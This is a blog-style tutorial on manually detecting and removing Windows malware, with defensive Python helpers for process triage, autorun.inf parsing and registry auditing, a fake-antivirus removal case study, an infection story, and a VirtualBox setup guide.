If someone says that he never encountered a malware infection on his PC, he is probably lying. Whatever antivirus you use, at some point of time you will face the occasion that your PC gets infected and your antivirus never detected it. Modern day heuristics enabled antivirus have reduced such chances, but most of the time it’s not so. The strangest thing about malware is that you feel their presence without any diagnostics! Maybe that’s because of the resonance that we develop with our PCs over time…!

Let’s first learn what malware are…

Types of malware:

  1. Virus: A virus is a malicious program that can replicate itself and affect normal operations of a system without knowledge or permission of the user. It attaches itself to executable code and runs every time the code is run, making multiple copies of itself. It corrupts the files, denies access to data and hence renders data useless.
  2. Worm: Unlike a virus, a worm is independent and doesn’t attach itself to any file or code. It is capable of spreading without need of any host file. It replicates by copying itself through the network. Worms prominently attack only networks, sending their copies to all users in your address book, causing DoS (Denial of service) attacks and affecting your internet functionality.
  3. Trojans: As the name goes, it hides inside a seemingly legitimate program and runs malicious code from there. Once run, the host computer gets infected and it starts replicating. It performs various activities like sending your data to its creator, or logging what you type (your passwords, bank account details) and sending them to its creator without your consent. It can even cause damage to your data by simply deleting it. Trojans have capability to change their code to trick the antivirus programs into not detecting them. Some are even scheduled to strike at preset dates.
  4. Spyware: Very similar to Trojans, these applications are solely designed to steal your data. But unlike Trojans, they don’t have the capability to replicate themselves.
  5. Cloaked malware: These are the new generation malware that are becoming a nightmare in the computing sector. Cloaked malware are Rootkits that are invisible to Windows Explorer and hence to antivirus. They run hidden from task manager, making it difficult to mark their presence. Their files are hidden on the system and thus antivirus doesn’t detect them.

So, these are malware. Once executed by us, they go active in system memory, multiplying, applying constraints to privileges and adding entries to the registry to make sure that they are run at least once when the system starts. They add malicious entries to the registry to make sure that they stay masked by disabling task manager, registry editor and folder options. They make files that enable them to be executed when drives are opened and continuously monitor our system to gain a chance to spread. But how do we identify their presence in our systems? These are the symptoms….


i. Unrecognised processes and files: The presence of unrecognised processes running in task manager or presence of unrecognised files on drives marks presence of malware.

The key to identifying the presence is to keep vigil on the processes that run in the background. This begins from the day you install a software: see what process it runs. Also remember what all files you have present on your hard drive. Any new file or folder with .exe extension, anything with a provocative name or cute icon can potentially be a result of infection. In the event of task manager being disabled, Process Explorer by Sysinternals can be used to analyse the running processes.


ii. File and system behaviour: If you ever notice that drives open in new windows, system taking more time during startup, CPU showing excessive activity even on no load or files or folders reappearing even after deleting them or not getting deleted at all, there is a high probability that your system is infected.

Files in pendrive disappearing and being replaced by smaller folders (with .exe extension if noticed) very clearly indicates presence of malicious code.

File activity can be detected by using the application filemon. An expert view on file activity can easily uncover malicious activity.

iii. Network activity: If you get complaints that some of your friends are getting strange e-mails from you, with links to unknown sites or strange file attachments, this could be a worm at work.

Increased network activity noticed in portmon etc also implies presence of network worms.

iv. Reduced privileges: Getting error messages of “….disabled by administrator….” on running Run, Task manager or accessing Registry editor etc plainly implies your system is infected and malicious entries have been made in the registry.

v. Malicious entries in registry: The same applies when you get errors on startup like file not found etc. This is because of malicious programs making entries in the registry to auto start at system startup. This can also be analysed by using the application Autoruns from the Sysinternals suite. Or simply run MSCONFIG in the run menu and check startup applications.

These symptoms confirm presence of malware in your PC. Now that you know that you two aren’t alone, how do you zero in on the culprit, keeping in mind that your loyal antivirus let it in? Here under is a step by step procedure to catch the culprit and to kick it out. Stop all other applications and disconnect the internet. Keep your weapons handy…….. War has begun!

Eradication of malware:

i. Identification of process in memory: Once executed, the conventional malware tend to be active in system memory, running a process that carries out the task the malware was designed to do. Nowadays it is common that malware alters the registry to disable task manager, Run and registry editor, hence use Process Explorer to view active processes in memory. Tips for identification include-

a. Usually a few malware are easily identified by very high CPU usage even when you aren’t running any CPU consuming application.

b. Many carry names that are suspicious to even laymen. Some include Khatarnak.exe, khatra.exe, music.exe, new folder.exe, soundmix.exe, etc. Most of them run under the explorer section in process explorer.

c. Smart viruses today carry names that are spoofs of Windows processes. For example, Regsvr32.exe is a Windows application, but a virus carries the name Regsvr.exe. Similarly a malware spoofs the name of the Windows service host svchost.exe and runs a process svcshost.exe. In such cases identification becomes tough and depends more on your experience and logical approach. Obviously a process Regsvr.exe isn’t expected to run always in your system. And a service host with odd spelling that runs under explorer is suspicious. Assistance can always be taken on-line regarding any suspicious process.

d. Repetitive processes of same name present in memory, when just one or no such application is running, also points out that the process is malicious code. But svchost.exe is one exception, with 5 such processes running at a time.

e. Reverse analysis can be made by identifying all legitimate processes and their triggering applications to identify the left out applications as suspicious.

f. Cloaked malware aren’t easily identified since they run hidden from explorer. Their files and memory residency aren’t visible. Hence, their presence is hard to verify. The Sysinternals tool RootkitRevealer does a good job in detecting Rootkits. It scans the registry and file system for discrepancies and lets us know of possible Rootkits that are actually present but not reported by the Windows API. Extreme caution should be taken while taking any action based on its result, since it gives only a probable result, not a certain one. Rootkits are those set of malware which I suggest are better removed using antiviruses.

Having identified the malicious process in memory, the next task is to know where it is executing from. This can easily be verified from process explorer.
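Tips c and d, together with the check on where a process executes from, can be applied mechanically to a saved process list. The following Python is an added example, not a tool from this post: the list of genuine names, the edit-distance threshold of 2 and the sample process list are assumptions made for illustration, and every hit is a prompt to look closer rather than a verdict.

```python
import ntpath
from collections import Counter

# Genuine Windows process names and the folder each loads from, relative to
# %windir% ("" means %windir% itself). Illustrative list, not a complete one.
KNOWN = {
    "svchost.exe": "system32", "regsvr32.exe": "system32",
    "winlogon.exe": "system32", "services.exe": "system32",
    "lsass.exe": "system32", "csrss.exe": "system32",
    "smss.exe": "system32", "explorer.exe": "",
}


def edit_distance(a, b):
    """Levenshtein distance: single-character inserts, deletes, substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(processes, windir=r"C:\WINDOWS", max_distance=2):
    """Return (name, path, reason) for each process worth a closer look."""
    findings = []
    for name, path in processes:
        low = name.lower()
        if low in KNOWN:
            # Right name: the image must also sit in the expected folder.
            expected = ntpath.join(windir, KNOWN[low]).rstrip("\\")
            if ntpath.dirname(path).lower() != expected.lower():
                findings.append((name, path, "system name, expected in " + expected))
            continue
        # Unknown name: is it a near miss of a genuine one (tip c)?
        nearest = min(KNOWN, key=lambda k: edit_distance(low, k))
        if edit_distance(low, nearest) <= max_distance:
            findings.append((name, path, "lookalike of " + nearest))
    # Tip d: repeated instances of one name, svchost.exe being the exception.
    counts = Counter(name.lower() for name, _ in processes)
    for low, n in counts.items():
        if n > 1 and low != "svchost.exe":
            findings.append((low, "", "%d instances running" % n))
    return findings


# Constructed sample: (process name, image path) pairs as Process Explorer
# would show them. The spoofed names are the ones quoted in the text.
SAMPLE = [
    ("svchost.exe", r"C:\WINDOWS\system32\svchost.exe"),
    ("svchost.exe", r"C:\WINDOWS\system32\svchost.exe"),
    ("explorer.exe", r"C:\WINDOWS\explorer.exe"),
    ("svcshost.exe", r"C:\WINDOWS\svcshost.exe"),
    ("Regsvr.exe", r"C:\WINDOWS\system32\Regsvr.exe"),
    ("svchost.exe", r"C:\Documents and Settings\user\svchost.exe"),
    ("music.exe", r"E:\music.exe"),
    ("music.exe", r"E:\music.exe"),
    ("notepad.exe", r"C:\WINDOWS\system32\notepad.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A legitimate program whose name happens to sit close to a system name will also be listed, so confirm each hit against its path and publisher before acting on it.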

ii. Stopping the malicious code execution: The next step is to stop the execution of malicious code. As long as it is active in memory, the malicious code can keep multiplying, monitors the system to maintain its malicious action, and keeps vigil on the registry, not allowing it to be rectified. This task can simply be done by task manager/ process explorer or may even need a boot from a secondary device.

Note: Now on, don’t open any drives by double clicking on them, since this can trigger drive autorun which is usually linked to auto running malicious code using an autorun.inf file. Open drives by address bar or explore instead. Do not open any new folders etc, since they can probably be masked Trojans having folder icon!

a. The basic step is to end task the identified malware to stop its execution. This can be done directly by process explorer. In case a new malicious process pops up on termination of the first process, it is probably running from another location. End task that process too. Preferably end task the process tree, but be sure you have noted down where it is executing from.

b. In case the process keeps on starting again and again, it has probably got another file backing it up. In that case, using killbox, end process and delete the file. To use killbox, it is required to know the location of the file, which is obtained from process explorer.

Note: Even if the file was end tasked in step a., it has to be deleted using killbox. The reason killbox’s option to end the explorer shell isn’t given priority is that, when a file is deleted with that option, it restarts Windows Explorer, which is often accompanied by the malicious code executing again. The best way is to end task the process using process explorer, then delete it using killbox. If the file is in use, unlock it using the tool Unlocker, and then delete it.

c. Some smart malware can’t be deleted even using killbox, citing privilege issues. Then it is required to boot from a secondary device, preferably a Bart’s PE live CD, and delete the malicious files.

d. Rootkits once identified can be deleted the same way as above using killbox or by booting from a secondary device. Since the process they run is hidden, it becomes tough to verify whether the malware execution has stopped or not. Rely on your instincts to see if everything is ok or assume at this stage that malware is not active in memory now.

iii. Regaining authority: Malware usually limits our privileges to make sure it is hidden or can’t be detected. These include disabling task manager, Run, registry editor or disabling registry import etc. The next step is to regain control of our system.

a. In run type,

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

And run the command. This removes the entry in registry that had disabled registry editing. Now registry editing is allowed, though windows registry editor may still be disabled.

Note: Type the above command in a notepad and store it. Change extension to .bat , you get your own registry editing enabler tool!

b. Download the RatsCheddar tool and run it. This enables registry editor, task manager, folder options.

At this stage if you realise that restored defaults are altered once again to impose restrictions, this means malware is still active in memory. Repeat the identification and stop its execution.

iv. Removing supporting restart mechanisms: Now that malicious code isn’t active in memory, the next step is to remove its supporting mechanisms. Every malware once executed, makes sure that it is executed at least once on every system start up. This is achieved by entries in registry or modifying autoexec.bat or config.sys etc. Entries in registry are the most preferred option by malware, and we will go by it.

a. Many malware leave behind triggering files in drives that restart the malware in full force once the drives are double clicked. They work by making an autorun.inf file linked to the triggering malware file such that every time the drive is autorun, the malware is triggered again. Our first priority is to remove such kind of start mechanisms.

Open my computer, go to folder options and enable view hidden files and folder, un-tick hide extensions of known file types & hide protected operating system files. Upon un-ticking hide protected operating system files, a confirmation is asked, confirm positive. Once finished, apply the settings. Now enter C: drive by address bar or by right clicking and explore. You will now see many files that were hidden earlier.

Check for the presence of any autorun.inf file. Open it by double clicking it (it won’t hurt!!) and if readable, check what file was meant to be auto run.

Caution: There are many system files visible that are responsible for booting your system. Do not go on a random deletion spree, lest your system doesn’t boot again!! Some of the system files and folder are:

Autoexec.bat, config.sys, hiberfil.sys, pagefile.sys, IO.sys, MSDOS.SYS, boot.ini, NTDETECT.COM, ntldr and config.sys folder, system volume information folder, recycler folder etc.

Delete the file mentioned in autorun.inf file and also the autorun.inf file itself. Also delete anything like a folder of any name with an .exe extension. Also delete any other .BAT or .COM file other than those mentioned above. Repeat the process for all drives, opening each of them without double clicking them. In event of confusion, take help online, preferably on another system.
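Reading an autorun.inf by eye gets tedious when it is padded with junk lines or saved as UTF-16. The following Python is an added example, not part of the original post: it lists every entry in the [autorun] section that launches a program and resolves it to the path to inspect on that drive. The sample file content is constructed, using the U.COM name from the story later on this page.

```python
import ntpath
import re

# Keys in the [autorun] section that start a program: open=, shellexecute=
# and any shell\<verb>\command= entry (double-click and right-click verbs).
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)


def decode(raw):
    """autorun.inf is plain text, but some copies are saved as UTF-16."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("latin-1")  # never fails; enough for key/value scanning


def launch_commands(raw):
    """Return [(key, command)] for each [autorun] entry that starts a program."""
    section, out = None, []
    for line in decode(raw).splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue  # padding lines and other sections are ignored
        key, _, value = line.partition("=")
        if LAUNCH_KEY.match(key.strip()):
            out.append((key.strip().lower(), value.strip()))
    return out


def targets(raw, drive="C:"):
    """Resolve each launch command to a file path on the given drive.

    Only the first token of the command is resolved; if it is a system
    program, read the full command from launch_commands() for its arguments.
    """
    found = []
    for _, command in launch_commands(raw):
        m = re.match(r'"([^"]+)"|(\S+)', command)
        if not m:
            continue
        program = m.group(1) or m.group(2)
        path = ntpath.normpath(ntpath.join(drive + "\\", program))
        if path not in found:
            found.append(path)
    return found


# Constructed sample: junk padding around three entries that all start the
# same file, plus a harmless icon entry.
SAMPLE = (b"[AutoRun]\r\n"
          b";kd93jfKDls02\r\n"
          b"open=U.COM\r\n"
          b"jf8sKdl2ms9\r\n"
          b"shell\\open\\Command=U.COM\r\n"
          b"shell\\explore\\Command=\"U.COM\" -e\r\n"
          b"icon=%SystemRoot%\\system32\\shell32.dll,4\r\n")

if __name__ == "__main__":
    for key, command in launch_commands(SAMPLE):
        print(key, "->", command)
    print(targets(SAMPLE, "E:"))
```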

Entries in the registry are made to make sure that malware executes at every system startup and stays in memory. Use the tool Autoruns from Sysinternals to check start-up keys in the registry. It lists all processes and files scheduled to be autorun at startup, in the logon tab. Search and delete any suspicious entries.

Another useful tool is HijackThis from Trend Micro. This tool lists all non-Windows processes starting at startup, making it possible to have a clear picture of the scenario. It has a tool called ADS scanner that can be used to detect Rootkits as well. All such malicious entries are to be simply deleted.
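The restriction values from step iii and the start-up entries described here can both be read out of plain `reg query` output. The following Python is an added example, not the author's restore tool or Autoruns: it flags restriction values that are switched on, Run entries whose file no longer exists and Run entries named after a system process that start something else. The sample output is constructed from values quoted on this page; DisableTaskMgr, NoRun and NoFolderOptions are standard Windows policy values that the page does not spell out.

```python
import ntpath
import re

VALUE_LINE = re.compile(r"^\s+(.+?)\s+(REG_[A-Z_]+)\s+(.*)$")
# Program part of a Run command: a quoted path, or text up to the extension.
TARGET = re.compile(r'^"([^"]+)"|^(.+?\.(?:exe|com|bat|cmd|scr|pif))\b', re.I)
SYSTEM_NAMES = {"winlogon", "svchost", "explorer", "lsass", "services", "csrss"}

# Policy values that lock the user out when set to a non-zero DWORD.
RESTRICTIONS = {
    r"policies\system": {"disableregistrytools": "Registry Editor",
                         "disabletaskmgr": "Task Manager"},
    r"policies\explorer": {"norun": "Run dialog",
                           "nofolderoptions": "Folder Options"},
}


def parse_reg_query(text):
    """Yield (key, value_name, type, data) from `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key:
            m = VALUE_LINE.match(line)
            if m:
                yield (key,) + m.groups()


def stem(filename):
    return ntpath.splitext(ntpath.basename(filename))[0].lower()


def audit(text, exists):
    """Return (kind, value_name, detail); exists(path) says if a file is on disk."""
    findings = []
    for key, name, rtype, data in parse_reg_query(text):
        low_key, low_name = key.lower(), name.lower()
        for suffix, values in RESTRICTIONS.items():
            if (low_key.endswith(suffix) and low_name in values
                    and rtype == "REG_DWORD" and int(data, 16) != 0):
                findings.append(("policy", name, values[low_name] + " disabled"))
        if not low_key.endswith(r"currentversion\run"):
            continue
        m = TARGET.match(data.strip())
        if not m:
            findings.append(("run", name, "cannot parse command: " + data))
            continue
        target = m.group(1) or m.group(2)
        if not exists(target):
            # Leftover entry: this is what produces "file not found" at logon.
            findings.append(("run", name, "target missing: " + target))
        elif stem(name) in SYSTEM_NAMES and stem(target) != stem(name):
            findings.append(("run", name, "named like a system process but runs "
                             + ntpath.basename(target)))
    return findings


# Constructed `reg query` output and a constructed set of files on disk.
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    cdoosoft    REG_SZ    C:\WINDOWS\system32\olhrwef.exe
    winlogon    REG_SZ    C:\WINDOWS\force.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableRegistryTools    REG_DWORD    0x1
    DisableTaskMgr    REG_DWORD    0x0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoFolderOptions    REG_DWORD    0x1
"""
ON_DISK = {r"c:\windows\system32\ctfmon.exe", r"c:\windows\force.exe"}


def sample_exists(path):
    return path.lower() in ON_DISK


if __name__ == "__main__":
    for finding in audit(SAMPLE, sample_exists):
        print(finding)
```

On a live system, pass `lambda p: os.path.exists(os.path.expandvars(p))` as `exists` and feed in the text printed by `reg query` for each key.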

v. Finishing with cleaning all scrap: By this time you will know what had struck you. Search on net for more details regarding the infection and delete its sister files as well. Had there been any entries that were left ignored by you, delete them too, verifying them from net.

Clean all temporary files, type temp, %temp%, prefetch in run command (one at a time!)  and open the locations. Delete all files stored in them. Use Unlocker to unlock any locked files. Delete all cookies and other files in download folders. Go for a manual hunt in documents and settings folder and delete any last traces of infection.

Delete all previous system restore points, since they may be hiding infection.  Keep an antivirus handy. Restart your system now. Check startup time, verify task manager is working and check processes running in it. If all things work fine, congrats!! You just won the battle!!

Any cryptic error messages like file not found mean start up entries for malicious code are still present though the code is not. Simply run autoruns and in the logon tab, search for an entry which has a file missing error beside it, and simply delete it. Install a good antivirus and update it. Preferably re-install the web browser too.

Now that your system is malware free, make a commitment to her that from now on you play clean, play safe. Keep updating your antivirus and be cautious online, avoid dirty sites, install an antivirus with site advisor, be extra cautious with removable media.

Hope you live happily hereafter!!

Note: A case study- Remove System security fake antivirus.

Due to popular demand noticed, I have posted the specific procedure to remove system security malware manually.

Kill processes:
Open Process explorer and kill the process named 1632575944.exe .  It may also carry some other number as name. Kill it, after you note the location it is executing from.

Delete registry values:

Open registry editor and delete the value. You may need to restore defaults using my restore default tool to enable registry editing and other defaults( Go to home page and download it from downloads section).
%UserProfile%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “1632575944”

Else you can use the autoruns tool and delete this key from logon tab.

Delete files:

Search and delete the following files. You can use windows search too.
1632575944.exe, config.udb, init.udb, English.lng, German.lng, Spanish.lng, System Security.lnk

Delete directories:
c:\Documents and Settings\All Users\Application Data\538654387
c:\Documents and Settings\All Users\Application Data\538654387\Languages
C:\Documents and settings\All Users\Start Menu\Programs\System Security

Reboot and check if everything is ok.

New generation malware

Though I don’t like telling stories, this one is really adventurous and I suggest you reading it since its about an encounter with a deadly malware and I am the hero!

As I had described in my previous posts, the conventional way of zeroing in on a virus seemed to be really apt to me for all kinds. This was the same until I saw new viruses in my college digital library (I would rather call it virus vault!). They were a breed apart: unlike normal viruses, they didn’t have any visible process running in task manager. This made it really tough to mark their presence in PCs. For a while I was tricked into believing that they didn’t exist on the PC and it had slowed down because of other issues. When I brought my pendrive back home, I noticed a new file U.COM in it, which didn’t execute thanks to my folder autorun.inf which is always present on my pendrive. Now I was sure the virus was present on the college PCs, but didn’t have enough patience and time to go back there to try busting it, the place being public in nature.

A few days ago I was at my friend’s place, whose system gave a whole lot of problems ranging from slow start up, net getting disconnected, and browser hanging with errors. He was pleading to format his system and repartition it to remove any malware hiding in other drives. FORMAT!!! The word I hate the most! I sat there with determination that it’s either the malware or me that’s getting screwed, and was able to ultimately fix it. Here is how I did it…..

  1. Opening task manager didn’t do much help since it showed no presence of any suspicious process.
  2. Upon opening a drive, it opened in a new window. This made me certain that some code was being executed prior to opening the drive, marking presence of an autorun.inf file, which will be super hidden.
  3. Initially I tried restoring registry defaults, but it didn’t work, indicating malware was active and was monitoring registry changes and re-writing the malicious keys if original entries were restored.
  4. Since the only thing I was certain of was presence of an autorun.inf file, I went for the kill. Using killbox, I wrote the address of the file as C:\autorun.inf and was able to find the file and deleted it. Since killbox takes backup of deleted file in a folder in C: drive, I accessed the file. Opened it by double clicking it (don’t be afraid, these files won’t eat up your system when opened!). I found code to execute a U.COM file on drive autorun. This made me happy since I got another chance to take my old revenge with this guy!
  5. Using killbox, I gave instruction to delete the file C:\U.COM. I was able to find the file and deleted it. I repeated steps iv and v for all drives.
  6. To be certain to delete all files, I searched internet for details on malware named U.COM and was able to find what all files it creates. I deleted,




and delete the registry key-

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cdoosoft C:\WINDOWS\system32\olhrwef.exe

  7. Having cleaned the mess, I restored windows registry defaults, entered each drive, created a dummy autorun.inf folder and deleted suspicious files as well. Also delete all files that killbox had taken backup after deleting. I deleted all files from all temp locations and using ccleaner, deleted the start up entries of U.COM. Search in registry editor for U.COM entries and delete them all. Usually there are other related entries in the same sub key, delete them too. Restart your system and check if everything is OK.

The malware U.COM comes in the category of CLOAKED MALWARE, the new generation viruses. They run hidden from task manager, inside a background service, like svchost, along with other system processes. They write to other programs’ virtual memory, which is also called process hijacking. They are packed and/or encrypted to be invisible to our eyes. U.COM adds itself as a registry auto start entry so that it loads on boot up. It creates various files inside the system32 folder and also in all drives, and alters the registry to hide its files from the user.

PC slow and don’t see any reason why, beware, you could be a victim!!

Virtualised life

There are various occasions when we take a backseat in experimenting with new software, courtesy of our fear of unstable Windows. Not to mention our hesitance to try our hands on those colourful Linux distributions, debating if it’s really worth sparing a partition for the new OS. And after the last dose of Bart’s PE, many brave guys must have burned a few not so good CDs, with others fearing to risk a disk, not sure if their .ISO will work. And let’s remember our biggest fear, reinstalling the OS and all our programs due to various reasons. Have you ever thought if there is any one solution to all these problems?

To all those troubled guys, here is the single solution that fixes all your problems- Virtualization. Virtualization deals with creating various virtual machines under one single physical machine. The virtual machines share hardware resources with the physical machine.

The advantages of using virtual machines are numerous. You can install and run multiple operating systems (guests) on a single machine (host) and switch between them easily using the host machine without need to log off from any of them. That means running Vista, Ubuntu, Fedora, Red Hat etc in various windows under your Windows XP!

Apart from that, you have the facility to create shared folders between the host and guest PCs, enabling data sharing. Install all your programs under the virtual XP and save its state. Always run virtual XP and in future if there is any issue with it, just switch back to the saved state on a click! Else install and use not frequently used and large programs like office suite etc in virtual XP to save your host registry from 20,000 entries.

Else just create a virtual PC, don’t install anything, and boot it from your Bart’s PE live Windows CD or even through an ISO on your host HDD! Great way to test your live Windows before burning to CD.

There are various tools available in the market that support virtualization, from freeware to free to try ones. But the one I chose, taking into account its functionality, ease of operation and cost (free!!!), is Sun VirtualBox. Download the software from home site, some 30 Mb size.

Installation and usage:

Installation is easy and neat. After you install it, run the application. You are welcomed by the first run menu that directs you to creating a new virtual PC. Steps are given here under to set up a virtual PC.

  1. Click on New tab in welcome screen. This runs a virtual machine wizard to create a virtual machine.
  2. Set a name to the virtual machine and select the type of OS and its version you plan to install. Else select others and unknown version if you just want to make a virtual PC. Click next.
  3. Select the amount of RAM you can spare to your guest machine. The Rule of thumb is to assign 1/4th of net memory to the machine for a 512 MB machine, half of memory for 1 GB memory machines etc. Keep in mind not to starve your host PC for memory and to take care not to over assign memory to a single machine when you plan to install multiple machines. A machine to run Bart’s PE requires just 64 MB memory whereas an XP machine requires at least 256 MB for guest machine and at least an equal amount for the host. When done, click next.
  4. Select the virtual hard disk. Since this is the first time, you need to create a virtual hard disk first. Click new to enter the create VHD wizard. In hard disk type, select the dynamically expanding storage type since it is created quickly and is advantageous. In a dynamically expanding storage, the actual amount of space occupied by the VHD on the host HDD isn’t equal to the set limit, but equal to the actual space being used or required as of then. For example, when you create a 10 GB dynamic VHD, and install XP on it, it occupies just around 2-3 GB space and grows as the guest claims disk space, till the specified limit is reached. Select type and click next.

Set the size depending on the OS you plan to install in the virtual  machine. Click finish to complete VHD wizard.

  5. Select the created VHD and click next and then finish to complete the virtual machine creation wizard.
  6. The virtual machine is created. Select the machine and go to settings. Here you can anytime alter the resource allocation of the virtual machine. Set video memory, boot order and snapshot (saved system state) location.
  7. In CD/DVD ROM tab, you can mount a bootable ISO or set your machine to boot from your optical drives. Also you can enable floppy drive, USB drives, network adapters etc.
  8. To create a shared folder, its location has to be set but it can be enabled once guest OS is installed by installing virtualbox guest additions on the guest OS. Procedure is described at later stage.

Installing guest OS:

Make sure you have enabled CD/DVD ROM in your virtual machine and insert the installation media in the optical drive. Start your virtual PC. It opens in a window, but looks the same way your PC would have behaved during XP installation. Proceed the same way as you do when installing XP on your physical PC. Don’t run any more applications on the host PC since it may create competition for memory and CPU usage.

NOTE: While in virtual machine window, your mouse pointer is grabbed inside it  and you need to press your right CTRL key to free your pointer. So, don’t panic!

Once installation has finished, open XP. You may notice that only the virtual HDD is accessible and no contact can be made to your host HDD. Now shared folders have to be set up to create a data transfer channel between the physical and virtual PCs. Get out of the virtual PC pointer hold and click on the Devices tab on the running virtual machine window. Click install guest additions. A setup window pops up inside the virtual machine which sets up guest additions. After this, you have access to the shared folder, and your mouse pointer isn’t grabbed anymore.

After setting shared folders, install software inside your virtual machine. When done, save its state to which your machine can be restored if it encounters any problem in future.

In a similar way, many virtual machines can be set up on a single host PC, depending on its hardware resources (memory mostly). Have a happy virtualization!!